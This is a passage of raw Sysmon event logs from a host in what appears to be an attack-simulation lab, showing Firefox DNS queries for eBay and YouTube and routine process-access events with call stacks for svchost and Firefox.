Firefox\firefox.exe 22542200x800000000000000017187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.153{59A5CD1D-945A-6005-3305-00000000A301}7052www.ebay.de0type: 5 slot11847.ebay.com.edgekey.net;type: 5 e11847.g.akamaiedge.net;::ffff:104.79.89.85;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.152{59A5CD1D-945A-6005-3305-00000000A301}7052youtube-ui.l.google.com0172.217.18.110;172.217.21.238;172.217.22.78;172.217.22.110;172.217.23.110;172.217.23.174;216.58.205.238;216.58.207.46;216.58.207.78;216.58.208.46;216.58.210.14;216.58.212.142;216.58.212.174;142.250.74.206;172.217.16.142;172.217.16.174;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.152{59A5CD1D-945A-6005-3305-00000000A301}7052www.youtube.com0type: 5 youtube-ui.l.google.com;::ffff:172.217.16.174;::ffff:172.217.18.110;::ffff:172.217.21.238;::ffff:172.217.22.78;::ffff:172.217.22.110;::ffff:172.217.23.110;::ffff:172.217.23.174;::ffff:216.58.205.238;::ffff:216.58.207.46;::ffff:216.58.207.78;::ffff:216.58.208.46;::ffff:216.58.210.14;::ffff:216.58.212.142;::ffff:216.58.212.174;::ffff:142.250.74.206;::ffff:172.217.16.142;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.362{59A5CD1D-8E56-6005-2E00-00000000A301}246476.237.120.34.in-addr.arpa.0type: 12 76.237.120.34.bc.googleusercontent.com;C:\Windows\sysmon64.exe 10341000x800000000000000017228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:04.098{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:04.098{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:04.098{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:04.098{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:04.098{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.837{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program 
Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.837{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.786{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.786{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla 
Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.708{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla 
Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.708{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.786{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program 
Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+2bacb60|C:\Program Files\Mozilla Firefox\xul.dll+afe305|C:\Program Files\Mozilla Firefox\xul.dll+afe596|C:\Program Files\Mozilla Firefox\xul.dll+afbcde|C:\Program Files\Mozilla Firefox\xul.dll+afbf10|C:\Program Files\Mozilla Firefox\xul.dll+29b54bf|C:\Program Files\Mozilla Firefox\xul.dll+29b52a8|C:\Program Files\Mozilla Firefox\xul.dll+29b902e|C:\Program Files\Mozilla Firefox\xul.dll+29be3b4|C:\Program Files\Mozilla Firefox\xul.dll+29b23ae|C:\Program Files\Mozilla Firefox\xul.dll+29c1123|C:\Program Files\Mozilla Firefox\xul.dll+29c8ae2|C:\Program Files\Mozilla Firefox\xul.dll+ec4bb7|C:\Program Files\Mozilla Firefox\xul.dll+e1e321|C:\Program Files\Mozilla Firefox\xul.dll+348add|C:\Program Files\Mozilla Firefox\xul.dll+ecf5e7|C:\Program Files\Mozilla Firefox\xul.dll+e4a21b 10341000x800000000000000017322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.786{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+2bacb60|C:\Program Files\Mozilla Firefox\xul.dll+afe305|C:\Program Files\Mozilla Firefox\xul.dll+afe596|C:\Program Files\Mozilla Firefox\xul.dll+afbcde|C:\Program Files\Mozilla Firefox\xul.dll+afbf10|C:\Program Files\Mozilla Firefox\xul.dll+29b54bf|C:\Program Files\Mozilla Firefox\xul.dll+29b52a8|C:\Program Files\Mozilla 
Firefox\xul.dll+29b902e|C:\Program Files\Mozilla Firefox\xul.dll+29be3b4|C:\Program Files\Mozilla Firefox\xul.dll+29b23ae|C:\Program Files\Mozilla Firefox\xul.dll+29c1123|C:\Program Files\Mozilla Firefox\xul.dll+29c8ae2|C:\Program Files\Mozilla Firefox\xul.dll+ec4bb7|C:\Program Files\Mozilla Firefox\xul.dll+e1e321|C:\Program Files\Mozilla Firefox\xul.dll+348add|C:\Program Files\Mozilla Firefox\xul.dll+ecf5e7|C:\Program Files\Mozilla Firefox\xul.dll+e4a21b 10341000x800000000000000017321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.786{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+2bacb60|C:\Program Files\Mozilla Firefox\xul.dll+afe305|C:\Program Files\Mozilla Firefox\xul.dll+afe596|C:\Program Files\Mozilla Firefox\xul.dll+afbcde|C:\Program Files\Mozilla Firefox\xul.dll+afbf10|C:\Program Files\Mozilla Firefox\xul.dll+29b54bf|C:\Program Files\Mozilla Firefox\xul.dll+29b52a8|C:\Program Files\Mozilla Firefox\xul.dll+29b902e|C:\Program Files\Mozilla Firefox\xul.dll+29be3b4|C:\Program Files\Mozilla Firefox\xul.dll+29b23ae|C:\Program Files\Mozilla Firefox\xul.dll+29c1123|C:\Program Files\Mozilla Firefox\xul.dll+29c8ae2|C:\Program Files\Mozilla Firefox\xul.dll+ec4bb7|C:\Program Files\Mozilla Firefox\xul.dll+e1e321|C:\Program Files\Mozilla Firefox\xul.dll+348add|C:\Program Files\Mozilla Firefox\xul.dll+ecf5e7|C:\Program Files\Mozilla Firefox\xul.dll+e4a21b 
10341000x800000000000000017320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.786{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+2bacb60|C:\Program Files\Mozilla Firefox\xul.dll+afe305|C:\Program Files\Mozilla Firefox\xul.dll+afe596|C:\Program Files\Mozilla Firefox\xul.dll+afbcde|C:\Program Files\Mozilla Firefox\xul.dll+afbf10|C:\Program Files\Mozilla Firefox\xul.dll+29b54bf|C:\Program Files\Mozilla Firefox\xul.dll+29b52a8|C:\Program Files\Mozilla Firefox\xul.dll+29b902e|C:\Program Files\Mozilla Firefox\xul.dll+29be3b4|C:\Program Files\Mozilla Firefox\xul.dll+29b23ae|C:\Program Files\Mozilla Firefox\xul.dll+29c1123|C:\Program Files\Mozilla Firefox\xul.dll+29c8ae2|C:\Program Files\Mozilla Firefox\xul.dll+ec4bb7|C:\Program Files\Mozilla Firefox\xul.dll+e1e321|C:\Program Files\Mozilla Firefox\xul.dll+348add|C:\Program Files\Mozilla Firefox\xul.dll+ecf5e7|C:\Program Files\Mozilla Firefox\xul.dll+e4a21b 10341000x800000000000000017319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.645{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.645{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.645{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.645{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 